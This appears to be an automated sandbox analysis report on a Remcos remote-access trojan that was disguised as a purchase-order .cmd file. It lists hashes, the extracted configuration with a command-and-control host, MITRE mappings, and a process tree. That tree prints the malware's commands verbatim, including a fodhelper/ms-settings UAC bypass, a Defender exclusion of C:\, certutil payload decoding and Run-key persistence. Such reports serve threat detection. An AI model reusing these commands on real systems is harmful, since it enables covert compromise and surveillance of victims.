remcos | 574f194754022d9834c8d1a4c4013c25ef678e3d36b39238f9583bab7d745dc8

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
10/05/2024, 07:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Purchase Order is approved20240509.cmd
Size

2.4MB
MD5

fe393a407b85b37633f9c2dc593801b4
SHA1

ab6c1cc6fdc415738b74214db52d9805166a727b
SHA256

574f194754022d9834c8d1a4c4013c25ef678e3d36b39238f9583bab7d745dc8
SHA512

2a72142927ef087b47c3f3e3d80db96595b577aec50d6fff2ab57e4e434dfb9aa54fe2d37213e8d8b414340b6878365adfa29db4e75f6094d4698c60b92adf3f
SSDEEP

49152:Xgx8XXdStPR/FS/ncG6aoiQUiujLb5DxUaeNFWoqMr:g

Score

10^/10

remcos newremotehost-aprilfile persistence rat

Malware Config

Extracted

Family

remcos

Botnet

NEWRemoteHost-APRILFILE

www.pentegrasystem.com:9231

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-3A6IQD
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	per.exe

Executes dropped EXE 26 IoCs

pid	Process
3416	alpha.exe
3444	alpha.exe
3524	alpha.exe
2452	alpha.exe
560	alpha.exe
2412	alpha.exe
4564	alpha.exe
3260	xkn.exe
3224	alpha.exe
1296	ger.exe
4236	alpha.exe
4240	kn.exe
2180	alpha.exe
1676	kn.exe
3700	per.exe
4696	alpha.exe
556	alpha.exe
208	sppsvc.pif
4356	alpha.exe
2720	alpha.exe
4736	alpha.exe
4856	alpha.exe
3908	alpha.exe
4428	alpha.exe
3892	alpha.exe
1260	alpha.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kpeyvroh = "C:\\Users\\Public\\Kpeyvroh.url"	sppsvc.pif

Kills process with taskkill 1 IoCs

evasion

pid	Process
2116	taskkill.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\ms-settings	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\ms-settings\shell	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\ms-settings\shell\open	ger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\ms-settings\shell\open\command	ger.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2776	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	18	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	16	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3260	xkn.exe
3260	xkn.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
208	sppsvc.pif

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3260	xkn.exe
Token: SeDebugPrivilege	2116	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
208	sppsvc.pif

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 312 wrote to memory of 4056	312	cmd.exe	84
PID 312 wrote to memory of 4056	312	cmd.exe	84
PID 312 wrote to memory of 3416	312	cmd.exe	86
PID 312 wrote to memory of 3416	312	cmd.exe	86
PID 312 wrote to memory of 3444	312	cmd.exe	87
PID 312 wrote to memory of 3444	312	cmd.exe	87
PID 312 wrote to memory of 3524	312	cmd.exe	88
PID 312 wrote to memory of 3524	312	cmd.exe	88
PID 3524 wrote to memory of 1396	3524	alpha.exe	89
PID 3524 wrote to memory of 1396	3524	alpha.exe	89
PID 312 wrote to memory of 2452	312	cmd.exe	91
PID 312 wrote to memory of 2452	312	cmd.exe	91
PID 2452 wrote to memory of 948	2452	alpha.exe	92
PID 2452 wrote to memory of 948	2452	alpha.exe	92
PID 312 wrote to memory of 560	312	cmd.exe	93
PID 312 wrote to memory of 560	312	cmd.exe	93
PID 560 wrote to memory of 940	560	alpha.exe	94
PID 560 wrote to memory of 940	560	alpha.exe	94
PID 312 wrote to memory of 2412	312	cmd.exe	95
PID 312 wrote to memory of 2412	312	cmd.exe	95
PID 2412 wrote to memory of 1232	2412	alpha.exe	96
PID 2412 wrote to memory of 1232	2412	alpha.exe	96
PID 312 wrote to memory of 4564	312	cmd.exe	97
PID 312 wrote to memory of 4564	312	cmd.exe	97
PID 4564 wrote to memory of 3260	4564	alpha.exe	98
PID 4564 wrote to memory of 3260	4564	alpha.exe	98
PID 3260 wrote to memory of 3224	3260	xkn.exe	99
PID 3260 wrote to memory of 3224	3260	xkn.exe	99
PID 3224 wrote to memory of 1296	3224	alpha.exe	100
PID 3224 wrote to memory of 1296	3224	alpha.exe	100
PID 312 wrote to memory of 4236	312	cmd.exe	101
PID 312 wrote to memory of 4236	312	cmd.exe	101
PID 4236 wrote to memory of 4240	4236	alpha.exe	102
PID 4236 wrote to memory of 4240	4236	alpha.exe	102
PID 312 wrote to memory of 2180	312	cmd.exe	103
PID 312 wrote to memory of 2180	312	cmd.exe	103
PID 2180 wrote to memory of 1676	2180	alpha.exe	104
PID 2180 wrote to memory of 1676	2180	alpha.exe	104
PID 312 wrote to memory of 3700	312	cmd.exe	105
PID 312 wrote to memory of 3700	312	cmd.exe	105
PID 312 wrote to memory of 4696	312	cmd.exe	111
PID 312 wrote to memory of 4696	312	cmd.exe	111
PID 4696 wrote to memory of 2116	4696	alpha.exe	112
PID 4696 wrote to memory of 2116	4696	alpha.exe	112
PID 312 wrote to memory of 556	312	cmd.exe	116
PID 312 wrote to memory of 556	312	cmd.exe	116
PID 556 wrote to memory of 2776	556	alpha.exe	117
PID 556 wrote to memory of 2776	556	alpha.exe	117
PID 312 wrote to memory of 208	312	cmd.exe	118
PID 312 wrote to memory of 208	312	cmd.exe	118
PID 312 wrote to memory of 208	312	cmd.exe	118
PID 312 wrote to memory of 4356	312	cmd.exe	119
PID 312 wrote to memory of 4356	312	cmd.exe	119
PID 312 wrote to memory of 2720	312	cmd.exe	120
PID 312 wrote to memory of 2720	312	cmd.exe	120
PID 312 wrote to memory of 4736	312	cmd.exe	121
PID 312 wrote to memory of 4736	312	cmd.exe	121
PID 312 wrote to memory of 4856	312	cmd.exe	122
PID 312 wrote to memory of 4856	312	cmd.exe	122
PID 312 wrote to memory of 3908	312	cmd.exe	123
PID 312 wrote to memory of 3908	312	cmd.exe	123
PID 312 wrote to memory of 4428	312	cmd.exe	124
PID 312 wrote to memory of 4428	312	cmd.exe	124
PID 312 wrote to memory of 3892	312	cmd.exe	125

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Purchase Order is approved20240509.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:312
- C:\Windows\System32\extrac32.exe
  C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
  2⤵
  PID:4056
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
  2⤵
  - Executes dropped EXE
  PID:3416
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
  2⤵
  - Executes dropped EXE
  PID:3444
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3524
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
    3⤵
    PID:1396
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2452
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
    3⤵
    PID:948
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:560
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
    3⤵
    PID:940
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2412
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    3⤵
    PID:1232
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4564
- - C:\Users\Public\xkn.exe
    C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3260
  - - C:\Users\Public\alpha.exe
      "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3224
    - - C:\Users\Public\ger.exe
        
        C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        5⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:1296
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Purchase Order is approved20240509.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4236
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Purchase Order is approved20240509.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
    3⤵
    - Executes dropped EXE
    PID:4240
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2180
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
    3⤵
    - Executes dropped EXE
    PID:1676
- C:\Windows \System32\per.exe
  "C:\\Windows \\System32\\per.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3700
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4696
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM SystemSettings.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2116
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:556
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 2
    3⤵
    - Runs ping.exe
    PID:2776
- C:\Users\Public\Libraries\sppsvc.pif
  C:\Users\Public\Libraries\sppsvc.pif
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:208
- - C:\Windows\SysWOW64\extrac32.exe
    C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF
    3⤵
    PID:3044
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
  2⤵
  - Executes dropped EXE
  PID:4356
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
  2⤵
  - Executes dropped EXE
  PID:2720
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
  2⤵
  - Executes dropped EXE
  PID:4736
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:4856
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:3908
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:4428
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:3892
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:1260

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
1⤵
PID:544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
cd3e29a70e688aa35b65e371be096751

SHA1
89f644b3b533d60d7ce15962426a60312fb51b81

SHA256
ca17f8efb2c00d814014616923c99af8cfc55de7cfb1ea9e80ff79961c30bc64

SHA512
72b648e5ea9ccb0e5cbc23482ca06f5fb664d4b353d1abdd57922e446e2e5108962660edd80981de33217d965ce0068394365cec5d1b6ff2a3a87581faec4025

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pntew4um.qu4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Libraries\sppsvc.pif

Filesize
819KB

MD5
5754d97e3293f5c2192a23ac5ab7670e

SHA1
fe32ef084fcb4fc4ad3ecdfa9662ac3002883928

SHA256
bdef908222a5df808151d1d383101e2049d3d995e564dd6d9345214fe3198800

SHA512
2c8c15c75d28e28499eecc9c8e8dab7b1c2507c9ced1bddd9ccb6998bc1b2f0cfbf2c763e6b98c8fba51e683585bbacd791b0740a040977c8788dedb4d433c50

Download Submit
C:\Users\Public\alpha.exe

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\ger.exe

Filesize
75KB

MD5
227f63e1d9008b36bdbcc4b397780be4

SHA1
c0db341defa8ef40c03ed769a9001d600e0f4dae

SHA256
c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d

SHA512
101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9

Download Submit
C:\Users\Public\kn.exe

Filesize
1.6MB

MD5
bd8d9943a9b1def98eb83e0fa48796c2

SHA1
70e89852f023ab7cde0173eda1208dbb580f1e4f

SHA256
8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

SHA512
95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

Download Submit
C:\Users\Public\sppsvc.rtf

Filesize
1.6MB

MD5
0240edf5476c29058868d6c55171839e

SHA1
820845d637f7f3b97ce4c30e52db278dda37f955

SHA256
91b68a0e42f4ebeadd18b228353953cb34e1a86f7b88ac86895cac1be9c1ca5c

SHA512
9a0ce8ea056e2deb1b0fc0aa24c27298c27fa564ef51f122b2c142a776cf20a839b641d8b502c566f67172ee8e42009ae081fcbc8a4a9fc7c4c6939b0e57832e

Download Submit
C:\Users\Public\xkn.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows \System32\per.exe

Filesize
48KB

MD5
85018be1fd913656bc9ff541f017eacd

SHA1
26d7407931b713e0f0fa8b872feecdb3cf49065a

SHA256
c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5

SHA512
3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459

Download Submit
memory/208-93-0x000000002D8B0000-0x000000002E8B0000-memory.dmp

Filesize
16.0MB

Download
memory/208-99-0x000000002D8B0000-0x000000002E8B0000-memory.dmp

Filesize
16.0MB

Download
memory/208-82-0x000000002D8B0000-0x000000002E8B0000-memory.dmp

Filesize
16.0MB

Download
memory/208-100-0x000000002D8B0000-0x000000002E8B0000-memory.dmp

Filesize
16.0MB

Download
memory/208-87-0x000000002D8B0000-0x000000002E8B0000-memory.dmp

Filesize
16.0MB

Download
memory/208-88-0x000000002D8B0000-0x000000002E8B0000-memory.dmp

Filesize
16.0MB

Download
memory/208-89-0x000000002D8B0000-0x000000002E8B0000-memory.dmp

Filesize
16.0MB

Download
memory/208-90-0x000000002D8B0000-0x000000002E8B0000-memory.dmp

Filesize
16.0MB

Download
memory/208-84-0x000000002D8B0000-0x000000002E8B0000-memory.dmp

Filesize
16.0MB

Download
memory/208-75-0x0000000000400000-0x00000000004D5000-memory.dmp

Filesize
852KB

Download
memory/208-85-0x000000002D8B0000-0x000000002E8B0000-memory.dmp

Filesize
16.0MB

Download
memory/208-101-0x000000002D8B0000-0x000000002E8B0000-memory.dmp

Filesize
16.0MB

Download
memory/208-140-0x000000002D8B0000-0x000000002E8B0000-memory.dmp

Filesize
16.0MB

Download
memory/208-107-0x000000002D8B0000-0x000000002E8B0000-memory.dmp

Filesize
16.0MB

Download
memory/208-108-0x000000002D8B0000-0x000000002E8B0000-memory.dmp

Filesize
16.0MB

Download
memory/208-119-0x000000002D8B0000-0x000000002E8B0000-memory.dmp

Filesize
16.0MB

Download
memory/208-118-0x000000002D8B0000-0x000000002E8B0000-memory.dmp

Filesize
16.0MB

Download
memory/208-141-0x000000002D8B0000-0x000000002E8B0000-memory.dmp

Filesize
16.0MB

Download
memory/3260-33-0x00000181D8A70000-0x00000181D8A92000-memory.dmp

Filesize
136KB

Download